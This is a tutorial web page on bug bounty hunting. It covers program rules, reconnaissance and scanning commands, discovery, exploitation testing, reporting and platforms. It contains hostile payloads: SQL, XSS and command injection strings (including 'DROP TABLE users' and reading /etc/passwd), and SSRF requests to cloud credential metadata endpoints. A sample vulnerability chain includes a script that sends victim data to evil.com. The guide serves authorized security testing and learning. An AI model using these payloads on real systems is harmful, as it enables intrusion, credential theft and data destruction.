Bug Bounty Hunting
Learn how to find and report security vulnerabilities for rewards. A comprehensive guide to reconnaissance, discovery, exploitation, and reporting methodologies for becoming a successful bug bounty hunter.
What is Bug Bounty
Bug bounty hunting is a crowdsourced security testing model where organizations invite independent security researchers to find and report vulnerabilities in their systems. In return, hunters receive monetary rewards (bounties), recognition, or swag based on the severity and quality of the issues discovered.
The bug bounty industry has grown exponentially since its mainstream adoption in the early 2010s. Today, thousands of companies run active programs, and top hunters earn six-figure annual incomes finding security flaws in everything from major tech platforms to banking systems and government infrastructure.
How Bug Bounty Programs Work
# Bug Bounty Program Lifecycle
1. Program Creation
Company defines scope, rules, and reward structure
2. Scope Definition
Which assets are in-scope (domains, apps, APIs)
3. Rules of Engagement
Allowed testing methods, restrictions, and boundaries
4. Researcher Testing
Hunters perform authorized security testing
5. Report Submission
Detailed vulnerability report with PoC submitted
6. Triage & Validation
Company reviews, validates, and rates the finding
7. Reward & Remediation
Bounty paid, fix developed, and verified
Legal Considerations
Bug bounty programs provide legal authorization to test within defined boundaries. However, operating outside the program's scope is illegal and can result in criminal prosecution. Key legal principles:
- Only test in-scope assets - Never test systems not explicitly listed in the program scope.
- Follow the rules of engagement - Adhere to all restrictions (no DDoS, no social engineering unless allowed, etc.).
- Good faith testing - Minimize impact on production systems. Don't access or modify user data.
- Responsible disclosure - Report findings through the program's channel, never publicly until a fix is deployed.
- No extortion - Never threaten to disclose or demand more than the stated bounty.
Testing outside the scope of a bug bounty program is unauthorized access and is illegal under computer fraud laws (CFAA, CMA, etc.). Always verify the exact scope before testing. When in doubt, ask the program's security team.
What to Expect
- Not every valid bug pays - Many programs classify low-severity issues as informational or won't fix.
- Duplicates happen - If someone else reported it first, you'll get a duplicate status.
- Response times vary - Some triage in hours, others take weeks or months.
- Consistency wins - Top hunters don't find one big bug; they consistently report quality findings.
- Learning never stops - New features mean new attack surface. Stay curious and persistent.
Getting Started
Starting your bug bounty journey requires a solid foundation in security fundamentals, the right tools, and a structured approach to learning. Here's everything you need to begin.
Prerequisites
Before diving into bug bounty hunting, ensure you have a working knowledge of:
- Basic Networking - TCP/IP, DNS, HTTP/HTTPS, SSL/TLS, ports, and protocols.
- Web Technologies - HTML, CSS, JavaScript, how browsers work, cookies, sessions.
- Security Fundamentals - OWASP Top 10, common vulnerability classes, CIA triad.
- Linux Command Line - Comfortable navigating and operating from a terminal.
- Basic Scripting - Python, Bash, or JavaScript for automation and custom tools.
Setting Up Your Lab
# Install essential bug bounty tools
# Subfinder - Passive subdomain enumeration
go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
# httpx - HTTP probing
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
# Nuclei - Template-based vulnerability scanner
go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
# ffuf - Web fuzzer
go install github.com/ffuf/ffuf/v2@latest
# Amass - Attack surface mapping
go install github.com/owasp-amass/amass/v4/...@master
# Set up Burp Suite Community Edition
# Download from https://portswigger.net/burp/communitydownload
# Create project structure
mkdir -p ~/bugbounty/{targets,wordlists,scripts,reports}
cd ~/bugbounty
First Programs: Start with VDPs
Vulnerability Disclosure Programs (VDPs) are the best starting point. They don't offer monetary rewards but provide legal authorization to practice real-world testing without the pressure of competing for bounties.
Start with VDPs on platforms like HackerOne's Disclosure Program or Bugcrowd's Community programs. Once you consistently find valid issues, transition to paid bounty programs.
Learning Path
# Recommended Bug Bounty Learning Path
Month 1-2: Foundations
- Complete PortSwigger Web Security Academy labs
- Read "The Web Application Hacker's Handbook"
- Practice on DVWA, bWAPP, Juice Shop
Month 3-4: Tools & Recon
- Master Burp Suite (Proxy, Repeater, Intruder)
- Learn subdomain enumeration tools
- Practice Google dorking
Month 5-6: Real Programs
- Join HackerOne/Bugcrowd VDPs
- Focus on 1-2 programs, learn their codebase
- Submit your first reports
Month 7+: Paid Programs
- Transition to bounty programs
- Specialize in a niche (API, mobile, etc.)
- Build automation and custom wordlists
The Bug Bounty Mindset
Success in bug bounty hunting is as much about mindset as it is about technical skill. The hunters who consistently earn bounties think differently about applications and approach targets with a specific methodology.
Core Principles
- Think like an attacker - Don't just look for what the app does; look for what it shouldn't do.
- Depth over breadth - Understanding one target deeply is more profitable than scanning 100 targets superficially.
- Be patient - The best findings come from hours of understanding application logic, not from automated scans.
- Stay curious - "What happens if I..." is the most powerful question in bug bounty hunting.
- Document everything - Keep notes on what you've tested, what you've found, and ideas for future testing.
The best bug bounty hunters spend 70% of their time understanding the application and 30% actually testing. Read the source code, understand the business logic, and map the entire attack surface before running a single tool.
Reconnaissance Phase
Reconnaissance is the foundation of bug bounty hunting. The more you know about your target, the larger your attack surface becomes. A thorough recon phase can reveal hidden subdomains, exposed services, leaked credentials, and forgotten endpoints.
Subdomain Enumeration
Discover all subdomains associated with the target's main domain:
# Passive enumeration with subfinder
subfinder -d example.com -silent -o subdomains.txt
# Active enumeration with amass
amass enum -passive -d example.com -o amass_results.txt
# Combine and deduplicate
sort -u subdomains.txt amass_results.txt > all_subdomains.txt
# Certificate transparency logs
curl -s "https://crt.sh/?q=%.example.com&output=json" | \
jq -r '.[].name_value' | sort -u >> all_subdomains.txt
# DNS resolution - find live hosts
cat all_subdomains.txt | httpx -silent -o live_hosts.txt
Port Scanning
# Quick top 1000 ports scan
nmap -sV -sC -T4 target.com -oA nmap_quick
# Full port scan
nmap -p- -T4 --min-rate 5000 target.com -oA nmap_all
# Fast masscan for large-scale recon
masscan 10.0.0.0/8 -p0-65535 --rate 10000 -oL masscan_results.txt
# Service version detection on discovered ports
nmap -sV -sC -p 22,80,443,8080,8443 target.com
Technology Fingerprinting
# Wappalyzer (browser extension) for web technology detection
# WhatWeb - Command line technology fingerprinting
whatweb https://target.com -v
# HTTP headers analysis
curl -sI https://target.com | grep -iE "server|x-powered|x-aspnet"
# BuiltWith API for comprehensive tech profiling
curl "https://api.builtwith.com/free1/api.json?KEY=YOUR_API_KEY&LOOKUP=example.com"
Google Dorking
# Find exposed login pages
site:target.com inurl:login OR inurl:admin OR inurl:dashboard
# Find exposed files
site:target.com filetype:pdf OR filetype:doc OR filetype:xlsx
# Find subdomains
site:*.*.target.com -"www"
# Find exposed API endpoints
site:target.com inurl:api OR inurl:v1 OR inurl:v2 OR inurl:graphql
# Find sensitive info leaks
site:target.com "password" OR "secret" OR "api_key" OR "token"
# Find error pages and debugging info
site:target.com "warning:" OR "error:" OR "exception" OR "stack trace"
# Find exposed JS files with secrets
site:target.com ext:js inurl:config OR inurl:api OR inurl:env
JavaScript File Analysis
# Extract JS files from a website
gau target.com | grep "\.js$" | sort -u > js_files.txt
# Find endpoints and secrets in JS files
cat js_files.txt | while read url; do
curl -s "$url" | grep -oP '(https?://[^\s"'"'"']+|/[a-zA-Z0-9_/-]+)'
done | sort -u > endpoints.txt
# Use LinkFinder for endpoint extraction
python3 LinkFinder.py -i https://target.com -o cli
# Check for exposed API keys in JS
cat js_files.txt | xargs -I{} curl -s {} | \
grep -oiE (AKIA|AIza|sk_live|pk_live)[a-zA-Z0-9]{16,}
Wayback Machine & Archive
# Wayback Machine URLs
waybackurls target.com > wayback_urls.txt
# Find old/leaked endpoints
cat wayback_urls.txt | grep -v "\.css\|\.png\|\.jpg\|\.gif" | sort -u
# GAU (GetAllUrls) - multiple archive sources
gau target.com --threads 5 > gau_urls.txt
# Compare current vs historical for new features
diff (sort current_urls.txt) (sort wayback_urls.txt)
Certificate Transparency Logs
# Query crt.sh for certificate transparency data
curl -s "https://crt.sh/?q=%.example.com&output=json" | \
jq -r '.[].name_value' | sort -u
# Use CertSpotter API
curl -s "https://api.certspotter.com/v1/issuances?domain=example.com&include_subdomains=true&expand=dns_names" | \
jq -r '.[].dns_names[]' | sort -u
# Censys search for certificates
curl -s -u "API_ID:API_SECRET" \
"https://search.censys.io/api/v2/search/certificates?q=parsed.subject.common_name:example.com"
Discovery Phase
Once you've mapped the target's infrastructure, the discovery phase focuses on finding hidden content, endpoints, parameters, and attack surface within the in-scope applications.
Directory & File Fuzzing
# Directory fuzzing with ffuf
ffuf -u https://target.com/FUZZ \
-w /usr/share/wordlists/dirb/common.txt \
-mc 200,301,302,403 \
-o ffuf_dirs.json -of json
# Directory fuzzing with gobuster
gobuster dir -u https://target.com \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt \
-t 50 -x php,html,js,txt
# Feroxbuster - recursive content discovery
feroxbuster -u https://target.com \
-w /usr/share/wordlists/dirb/common.txt \
-d 3 --threads 50
# Virtual host fuzzing
ffuf -u https://target.com \
-H "Host: FUZZ.target.com" \
-w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-fs 4242
Parameter Discovery
# Arjun - parameter discovery tool
arjun -u https://target.com/api/endpoint -oJ params.json
# ParamSpider - mining parameters from dark corners of web
python3 paramspider.py -d target.com
# x8 - hidden parameter discovery
python3 x8 -u https://target.com/page -w /path/to/params.txt
# Manual testing with Burp Suite Intruder
# Use common parameter wordlists against discovered endpoints
API Endpoint Discovery
# Parse JS files for API endpoints
cat js_files.txt | xargs -I{} curl -s {} | \
grep -oP '["'"'"']/(api|v1|v2|graphql)[^"'"'"']*["'"'"']' | \
tr -d '["'"'"']' | sort -u
# Check for common API documentation
for path in /swagger.json /openapi.json /api-docs /graphql /.well-known/openid-configuration; do
curl -sk -o /dev/null -w "%{http_code} %{url_effective}\n" "https://target.com${path}"
done
# GraphQL introspection query
curl -s -X POST "https://target.com/graphql" \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name fields { name } } } }"}'
Sensitive File Discovery
# Common sensitive files to check
TARGET="https://target.com"
for file in /.env /config.json /robots.txt /sitemap.xml \
/.git/HEAD /.git/config /backup.zip /database.sql \
/wp-config.php.bak /web.config /server-status \
/.htaccess /phpinfo.php /debug/ /actuator; do
code=$(curl -sk -o /dev/null -w "%{http_code}" "${TARGET}${file}")
if [ "$code" != "404" ] && [ "$code" != "403" ]; then
echo "[+] Found: ${file} (${code})"
fi
done
Exploitation Phase
Exploitation is where you attempt to find and demonstrate security vulnerabilities. This phase combines manual testing techniques with automated scanning to identify weaknesses in the target application.
Manual Testing Techniques
- Authentication Testing - Test for brute-force protection, account lockout, password policies, and credential stuffing vulnerabilities.
- Authorization Testing - Attempt to access resources belonging to other users (IDOR/BOLA). Test privilege escalation paths.
- Input Validation - Test for XSS, SQL injection, command injection, and other injection vulnerabilities on every input field.
- Business Logic - Test for logic flaws: price manipulation, race conditions, workflow bypasses, and state manipulation.
- Session Management - Test cookie security, token handling, session fixation, and concurrent session limits.
Automated Scanning with Nuclei
# Update nuclei templates
nuclei -update-templates
# Scan live hosts with all templates
cat live_hosts.txt | nuclei -severity critical,high,medium -o nuclei_results.txt
# Scan with specific template tags
nuclei -l live_hosts.txt -tags cve,sqli,xss,rce -o specific_results.txt
# Scan with rate limiting (be respectful!)
nuclei -l live_hosts.txt -rate-limit 100 -o nuclei_results.txt
# Scan for misconfigurations
nuclei -l live_hosts.txt -tags misconfig -severity medium,high -o misconfig_results.txt
Business Logic Testing
# Race condition test - send multiple requests simultaneously
# Example: Coupon redemption
for i in {1..10}; do
curl -s -X POST https://target.com/api/redeem \
-H "Authorization: Bearer $TOKEN" \
-d '{"coupon":"DISCOUNT50"}' &
done
wait
# If all 10 succeed, race condition exists!
# Price manipulation test
POST /api/checkout
{
"items": [{"id": 123, "quantity": 1}],
"price": 0.01, <-- Manipulated price!
"discount_code": ""
}
# Parameter pollution
GET /api/user?id=123&id=456
# Does the server use the first or last value?
Authentication & Authorization Bypass
# JWT token manipulation
# Decode JWT and modify payload
eyJhbGciOiJIUzI1NiJ9.eyJ1c2VySWQiOiIxIiwicm9sZSI6InVzZXIifQ.signature
# Change role from "user" to "admin" and re-sign with known/weak secret
# IDOR - change user ID in request
GET /api/users/456/profile
# Try: 1, 2, 3, 100, 1000, or UUID patterns
# HTTP method override
X-HTTP-Method-Override: DELETE
X-HTTP-Method: DELETE
_method: DELETE
# Path traversal in API endpoints
GET /api/users/..%2Fadmin/profile
GET /api/users/%2e%2e%2fadmin/profile
Injection Testing
# SQL Injection quick test
' OR '1'='1
' UNION SELECT NULL--
1; DROP TABLE users--
# XSS basic test
<script>alert(1)</script>
<img src=x onerror=alert(1)>
"-alert(1)-"
# SSRF test
http://127.0.0.1
http://localhost:8080
http://[::1]
http://169.254.169.254 # AWS metadata endpoint
# Command injection test
; ls
| cat /etc/passwd
$(whoami)
`id`
Reporting Phase
A well-written report is just as important as finding the vulnerability. Clear, concise, and professional reports lead to faster triage, higher bounties, and a good reputation with program teams.
Report Structure
Title: [Severity] Brief Description of the Vulnerability
Example: [Critical] SQL Injection in User Search API Endpoint
Summary:
A brief 1-2 sentence description of the vulnerability and its impact.
Severity: Critical / High / Medium / Low / Informational
CVSS Score: 9.8
Affected Component:
https://target.com/api/v1/users/search
Steps to Reproduce:
1. Authenticate as a low-privileged user
2. Send GET request to /api/v1/users/search?q=test'
3. Observe SQL error in response
4. Use payload: test' UNION SELECT username,password FROM users--
5. Extract all user credentials from database
Impact:
Full database compromise. Attacker can extract all user data
including passwords, PII, and financial information.
Remediation:
- Use parameterized queries/prepared statements
- Implement input validation and sanitization
- Apply principle of least privilege to database accounts
PoC: [Attached: screenshot, HTTP request/response, video]
Writing Effective Reports
- Clear title - Include severity and vulnerability type in the title.
- Reproduce steps - Write steps so someone unfamiliar can reproduce the issue.
- Include PoC - Screenshots, HTTP requests, curl commands, or videos.
- Explain impact - Don't just say "XSS" - explain what an attacker can achieve.
- Suggest fixes - Show the program you understand the root cause.
- Be professional - Avoid humor, bragging, or aggressive language.
Programs triage hundreds of reports. A clear, well-structured report with reproduction steps and impact analysis stands out and gets processed faster. Poorly written reports are more likely to be closed as "not applicable."
Following Up
- Respond promptly - If triage asks questions, respond within 24 hours.
- Provide additional info - If they need more details for validation, supply them.
- Be patient - Triage can take days to weeks. Don't spam the program.
- Accept gracefully - If your report is closed, learn from the feedback.
- Check for regressions - Sometimes fixes are incomplete. Test again later.
Web Applications
Web applications are the most common bug bounty targets. They offer a wide attack surface including authentication, authorization, input handling, business logic, and client-side vulnerabilities.
Common Test Areas
- Authentication - Login, registration, password reset, MFA, OAuth flows.
- Authorization - IDOR, privilege escalation, horizontal/vertical access control.
- Input Handling - XSS, SQL injection, command injection, SSTI.
- Business Logic - Race conditions, price manipulation, workflow bypass.
- Error Handling - Verbose errors, stack traces, debug endpoints.
- File Upload - Unrestricted file types, path traversal, web shells.
- CORS & CSRF - Misconfigured CORS policies, missing CSRF tokens.
- Information Disclosure - Leaked source code, exposed .git, backup files.
Focus on new features and recent changes. New functionality is more likely to have vulnerabilities because it hasn't been extensively tested yet. Check changelogs, blog posts, and commit history for recent updates.
APIs
Modern applications are increasingly API-driven. APIs (REST, GraphQL, gRPC) present unique attack surfaces including mass assignment, BOLA/IDOR, broken authentication, and excessive data exposure.
REST API Testing
- Enumerate endpoints - Use Swagger/OpenAPI docs, JS analysis, and fuzzing.
- Test all HTTP methods - Try POST, PUT, PATCH, DELETE on GET-only endpoints.
- Parameter tampering - Modify IDs, add unexpected parameters, test mass assignment.
- Rate limiting - Test for brute-force protection on auth endpoints.
- Error handling - Send malformed input to trigger verbose error messages.
GraphQL Testing
# Introspection query - map the entire API schema
{
__schema {
types {
name
fields {
name
type {
name
}
}
}
}
}
# Test for IDOR via GraphQL
{
user(id: 1) {
email
role
passwordHash
}
}
# Batch query attack (rate limiting bypass)
{
"query": "query { user(id: 1) { email } }",
"extensions": {
"persistedQuery": { "version": 1, "sha256Hash": "abc123" }
}
}
Mobile
Mobile applications introduce platform-specific vulnerabilities including insecure data storage, certificate pinning bypasses, deep link exploitation, and mobile API weaknesses.
Android Testing
- APK Analysis - Decompile with jadx-gui, check for hardcoded secrets, insecure storage.
- Interception - Use Burp Suite with Android proxy to intercept API traffic.
- Certificate Pinning - Bypass with Frida or objection for MITM testing.
- Deep Links - Test exported activities and intent filters for unauthorized access.
- Root Detection Bypass - Test if the app can run on rooted devices.
iOS Testing
- IPA Analysis - Extract and analyze with class-dump or Hopper.
- Keychain Storage - Check for sensitive data stored insecurely in the keychain.
- URL Schemes - Test custom URL schemes for injection and unauthorized access.
- Universal Links - Test link handling for open redirect and auth bypass.
- Jailbreak Detection - Assess bypass techniques for security controls.
Infrastructure
Infrastructure targets include network services, cloud environments, DNS configurations, email systems, and server misconfigurations that can expose sensitive data or provide unauthorized access.
Network Testing
- Port Scanning - Identify open services, hidden admin panels, and development servers.
- Service Enumeration - Version detection for known CVEs and default credentials.
- SSL/TLS Testing - Weak ciphers, certificate issues, heartbleed, ROBOT attacks.
- DNS Zone Transfer - Attempt AXFR transfers to enumerate internal hosts.
Cloud Security
# AWS metadata endpoint (SSRF target)
curl -s http://169.254.169.254/latest/meta-data/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Check for exposed S3 buckets
aws s3 ls s3://target-company --no-sign-request
aws s3 ls s3://target-company-dev --no-sign-request
# Azure metadata endpoint
curl -s -H "Metadata:true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# GCP metadata endpoint
curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/"
# Check for exposed Docker registries
curl -s https://target.com:5000/v2/_catalog
Bug Bounty Platforms
Bug bounty platforms connect security researchers with organizations running vulnerability disclosure and bounty programs. Each platform has its own features, program types, and community.
HackerOne
The largest bug bounty platform with 2,000+ programs and $300M+ paid to researchers. HackerOne hosts programs for major companies including Apple, Google, Microsoft, and the U.S. Department of Defense.
- Hacktivity - Public feed of disclosed vulnerabilities for learning.
- Bounty programs - Paid programs with defined reward ranges.
- VDPs - Vulnerability Disclosure Programs (no monetary rewards).
- Response time - Most programs respond within 1-3 business days.
- HackerOne certifications - Verified skill levels (Reaper, Master, etc.).
Bugcrowd
A leading platform with a crowdsourced security model and structured program tiers. Bugcrowd is known for its VDPs and programs ranging from beginner-friendly to expert-level.
- Program tiers - Private, public, and invite-only programs.
- Bounty ranges - Clearly defined reward tables by severity.
- Submission quality - Focus on detailed, well-documented reports.
- Bugcrowd University - Free training resources for researchers.
Intigriti
A European-based platform known for its strong community engagement and innovative features like bug bounty challenges and live hacking events.
- Challenges - Monthly security challenges with prizes.
- Live hacking events - In-person and virtual events with top hunters.
- Intigriti blog - High-quality writeups and research articles.
YesWeHack
A global bug bounty platform with a strong focus on the European market. YesWeHack hosts programs for government agencies and large enterprises.
Immunefi
The leading platform for DeFi and Web3 bug bounties. Immunefi focuses exclusively on blockchain, smart contracts, and cryptocurrency projects with bounties often exceeding $1M.
Platform Comparison
Platform Programs Focus Avg Response Best For
───────────────────────────────────────────────────────────────────────────
HackerOne 2,000+ General Tech 1-3 days Beginners to Expert
Bugcrowd 500+ General Tech 1-5 days Structured Programs
Intigriti 300+ General Tech 2-4 days Community & Challenges
YesWeHack 400+ European Focus 2-5 days Government & Enterprise
Immunefi 100+ DeFi / Web3 1-3 days Smart Contract Bugs
Common Vulnerability Chains
The most impactful bug bounty findings often combine multiple lower-severity vulnerabilities into a chain that produces a critical impact. Learning to chain vulnerabilities is what separates average hunters from top earners.
IDOR + Information Disclosure
# Step 1: Discover IDOR in user profile endpoint
GET /api/users/123/profile
# Response exposes: email, phone, address, SSN (masked)
# Step 2: Discover verbose error messages leak internal data
GET /api/users/123/profile?id=' OR 1=1--
# Error: "SELECT * FROM users WHERE id = '' OR 1=1--"
# → Leaks database schema
# Step 3: Chain both for full data exfiltration
# Use the schema knowledge to craft UNION injection
# that extracts all users' unmasked PII
Impact: Full PII exposure for all users (Critical)
Open Redirect + OAuth Misconfiguration
# Step 1: Find open redirect
GET /redirect?url=https://evil.com
# Server redirects to https://evil.com
# Step 2: Find OAuth login uses open redirect domain
GET /oauth/authorize?redirect_uri=https://target.com/redirect?url=https://evil.com
# Step 3: Chain to steal authorization code
Victim clicks crafted link →
OAuth redirects to target.com/redirect →
Open redirect sends auth code to evil.com →
Attacker exchanges code for access token
Impact: Account Takeover via OAuth (Critical)
CORS Misconfiguration + CSRF
# Step 1: Discover permissive CORS policy
GET /api/user/profile
Origin: https://evil.com
# Response: Access-Control-Allow-Origin: https://evil.com
# Access-Control-Allow-Credentials: true
# Step 2: Find state-changing endpoint without CSRF tokens
POST /api/user/email
Content-Type: application/json
{"email": "attacker@evil.com"}
# Step 3: Craft malicious page to change victim's email
<script>
fetch('https://target.com/api/user/email', {
method: 'POST',
credentials: 'include',
body: JSON.stringify({email: 'attacker@evil.com'})
}).then(r => r.json()).then(data => {
// Exfiltrate response
fetch('https://evil.com/collect?data=' + JSON.stringify(data));
});
</script>
Impact: Account takeover via email change (High)
SSRF + Internal Service Discovery
# Step 1: Find SSRF in image import feature
POST /api/import-image
{"url": "http://127.0.0.1:8080/admin"}
# Step 2: Discover internal admin panel
# Response shows admin dashboard at 127.0.0.1:8080
# Step 3: Chain with AWS metadata for cloud takeover
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}
# → Leaks AWS IAM role credentials
# → Use credentials to access S3 buckets, DynamoDB, etc.
Impact: Full cloud infrastructure compromise (Critical)
Top Bug Bounty Tips
These tips from successful bug bounty hunters will help you maximize your findings and build a sustainable hunting practice.
Strategy Tips
- Focus on quality over quantity - One well-documented critical finding is worth more than 100 informational reports.
- Read the rules carefully - Understand scope, exclusions, and rewarded vulnerability types before testing.
- Look for new features - Recently launched features, beta programs, and A/B tests are the most vulnerable.
- Test on staging/dev environments - Many programs have non-production environments where testing is more permissive.
- Chain low-severity issues - Combine informational and low findings to demonstrate critical impact.
- Be professional - Treat programs like clients. Clear communication builds long-term relationships.
- Keep learning - Follow security researchers, read writeups, and adapt to new attack techniques.
1. Never test out of scope. 2. Never access other users' data. 3. Minimize production impact. 4. Report through official channels only. 5. Don't publicly disclose until a fix is deployed.
Resources
Curated resources to accelerate your bug bounty journey, from beginner-friendly platforms to advanced research materials.
Essential Books
- The Web Application Hacker's Handbook - The definitive guide to web application security testing by Dafydd Stuttard and Marcus Pinto.
- Bug Bounty Bootcamp - Vickie Li's comprehensive guide to bug bounty hunting, covering methodology, tools, and report writing.
- Real-World Bug Hunting - Peter Yaworski's collection of real vulnerability disclosures with detailed analysis.
- The Hacker Playbook 3 - Peter Kim's practical guide to penetration testing and red teaming.
Blogs & Research
- PortSwigger Research - Cutting-edge web security research from the creators of Burp Suite.
portswigger.net/research - Orange Tsai's Blog - World-class research on SSRF, deserialization, and web server vulnerabilities.
- NahamSec's Blog - Practical bug bounty tips, techniques, and writeups from a top hunter.
- Assetnote Research - Deep research on web technologies and novel vulnerability classes.
- SonicSecurty Research - In-depth analysis of enterprise software vulnerabilities.
YouTube Channels
- InsiderPhD - Beginner-friendly bug bounty tutorials and walkthroughs.
- NahamSec - Live hacking sessions, tips, and interviews with top researchers.
- STöK - Bug bounty content, methodology breakdowns, and tool reviews.
- The Cyber Mentor - Comprehensive security tutorials and practical hacking techniques.
- IppSec - Detailed HackTheBox walkthroughs that teach real-world attack techniques.
Communities
- HackerOne Hacktivity - Browse disclosed reports to learn from real findings.
- Bug Bounty Discord Servers - Join communities like Bug Bounty Village, Hacker101, and SecTalks.
- Reddit r/bugbounty - Active community for questions, tips, and discussions.
- Twitter/X Security Community - Follow researchers for latest findings and techniques.
Practice Platforms
- HackTheBox - Free and premium CTF-style challenges covering web, network, and active directory.
- TryHackMe - Guided learning paths with interactive browser-based labs.
- PortSwigger Web Security Academy - Free, comprehensive web security labs with detailed walkthroughs.
- DVWA (Damn Vulnerable Web Application) - Practice web vulnerabilities in a safe, local environment.
- OWASP Juice Shop - Modern vulnerable web application with 100+ challenges.
- PicoCTF - CTF challenges designed for beginners to learn security fundamentals.
Start with PortSwigger Web Security Academy labs, then move to HackerOne's free Hacker101 CTF. Once comfortable, join VDP programs on HackerOne or Bugcrowd to test against real applications.